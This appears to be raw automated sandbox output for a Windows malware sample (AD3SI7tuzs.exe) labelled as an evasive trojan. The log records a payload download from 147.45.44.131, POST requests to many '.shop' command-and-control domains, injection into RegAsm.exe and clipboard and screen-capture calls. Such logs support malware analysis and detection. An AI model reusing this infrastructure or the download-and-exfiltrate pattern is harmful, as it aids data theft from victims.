    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: GET /files/iy94.exe HTTP/1.1Host: 147.45.44.131Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: miracledzmnqwui.shop
    Source: global trafficDNS traffic detected: DNS query: locatedblsoqp.shop
    Source: global trafficDNS traffic detected: DNS query: traineiwnqo.shop
    Source: global trafficDNS traffic detected: DNS query: condedqpwqm.shop
    Source: global trafficDNS traffic detected: DNS query: evoliutwoqm.shop
    Source: global trafficDNS traffic detected: DNS query: millyscroqwp.shop
    Source: global trafficDNS traffic detected: DNS query: stagedchheiqwo.shop
    Source: global trafficDNS traffic detected: DNS query: stamppreewntnq.shop
    Source: global trafficDNS traffic detected: DNS query: caffegclasiqwp.shop
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: steppyplantnw.shop
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: miracledzmnqwui.shop
    Source: AD3SI7tuzs.exe, 00000000.00000002.2061615618.000000000253C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131
    Source: AD3SI7tuzs.exe, 00000000.00000002.2061615618.00000000024D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/files/iy94.exe
    Source: AD3SI7tuzs.exe, 00000000.00000002.2061615618.00000000024D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/files/iy94.exeP
    Source: AD3SI7tuzs.exe, 00000000.00000002.2061615618.000000000253C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: RegAsm.exe, 00000002.00000002.2107551919.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: RegAsm.exe, 00000002.00000002.2107551919.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: RegAsm.exe, 00000002.00000002.2107551919.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caffegclasiqwp.shop/
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caffegclasiqwp.shop/api
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caffegclasiqwp.shop/apiB-
    Source: RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Bh1h47R1I7Wg&a
    Source: RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: RegAsm.exe, 00000002.00000002.2107551919.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=LC2oZRCs
    Source: RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fIns
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locatedblsoqp.shop/apiu
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000102A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://miracledzmnqwui.shop/?
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000106E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://miracledzmnqwui.shop/api
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stagedchheiqwo.shop/apiA
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stagedchheiqwo.shop/e
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stamppreewntnq.shop/
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stamppreewntnq.shop/api
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000102A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2107243287.000000000106E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: RegAsm.exe, 00000002.00000002.2107551919.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: RegAsm.exe, 00000002.00000002.2107551919.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000106E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steppyplantnw.shop/
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000102A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steppyplantnw.shop/OE
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000106E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steppyplantnw.shop/Q
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000106E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steppyplantnw.shop/a
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steppyplantnw.shop/api
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steppyplantnw.shop/api&-
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steppyplantnw.shop/api0-
    Source: RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steppyplantnw.shop:443/apiiles/76561199724331900H
    Source: RegAsm.exe, 00000002.00000002.2107551919.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.20.40:443 -> 192.168.2.5:49707 version: TLS 1.2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042BDA0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_0042BDA0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042BDA0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_0042BDA0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00422B90 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_00422B90
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeCode function: 0_2_006E31A80_2_006E31A8
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004358722_2_00435872
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004168522_2_00416852
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040185E2_2_0040185E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004150702_2_00415070
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004050002_2_00405000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004100322_2_00410032
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041D9172_2_0041D917
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E1202_2_0041E120
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004371D02_2_004371D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004081E02_2_004081E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004209E42_2_004209E4
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004071802_2_00407180
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040E9882_2_0040E988
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004389902_2_00438990
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004369902_2_00436990
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004059A02_2_004059A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004042102_2_00404210
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00436AE02_2_00436AE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004362902_2_00436290
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004273792_2_00427379
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004253002_2_00425300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041FB092_2_0041FB09
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041CB122_2_0041CB12
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041BBC02_2_0041BBC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041F3E22_2_0041F3E2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004123872_2_00412387
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D4402_2_0040D440
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004304D02_2_004304D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00408CF02_2_00408CF0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004064802_2_00406480
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00407D502_2_00407D50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004045D02_2_004045D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004025E02_2_004025E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E5902_2_0041E590
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040EE4A2_2_0040EE4A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C6082_2_0040C608
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004076C02_2_004076C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004386802_2_00438680
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00436EB02_2_00436EB0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00433F002_2_00433F00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E7242_2_0041E724
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042EFC02_2_0042EFC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00421FA02_2_00421FA0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004187A0 appears 107 times
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004097E0 appears 50 times
    Source: AD3SI7tuzs.exe, 00000000.00000002.2060999115.000000000070E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs AD3SI7tuzs.exe
    Source: AD3SI7tuzs.exe, 00000000.00000000.2047297247.0000000000196000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameConsoleApp66.exe: vs AD3SI7tuzs.exe
    Source: AD3SI7tuzs.exeBinary or memory string: OriginalFilenameConsoleApp66.exe: vs AD3SI7tuzs.exe
    Source: AD3SI7tuzs.exe, Settings.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
    Source: classification engineClassification label: mal100.troj.evad.winEXE@3/1@11/4
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042A0C0 CoCreateInstance,2_2_0042A0C0
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AD3SI7tuzs.exe.logJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeMutant created: NULL
    Source: AD3SI7tuzs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: AD3SI7tuzs.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: AD3SI7tuzs.exeReversingLabs: Detection: 63%
    Source: unknownProcess created: C:\Users\user\Desktop\AD3SI7tuzs.exe "C:\Users\user\Desktop\AD3SI7tuzs.exe"
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: AD3SI7tuzs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: AD3SI7tuzs.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: AD3SI7tuzs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\Users\Administrator\Desktop\RunPE-x\ConsoleApp66\obj\Release\ConsoleApp66.pdb source: AD3SI7tuzs.exe
    Source: AD3SI7tuzs.exeStatic PE information: 0xD816DB22 [Sat Nov 18 09:02:26 2084 UTC]
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043C90C push ebx; retf 2_2_0043C90D
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
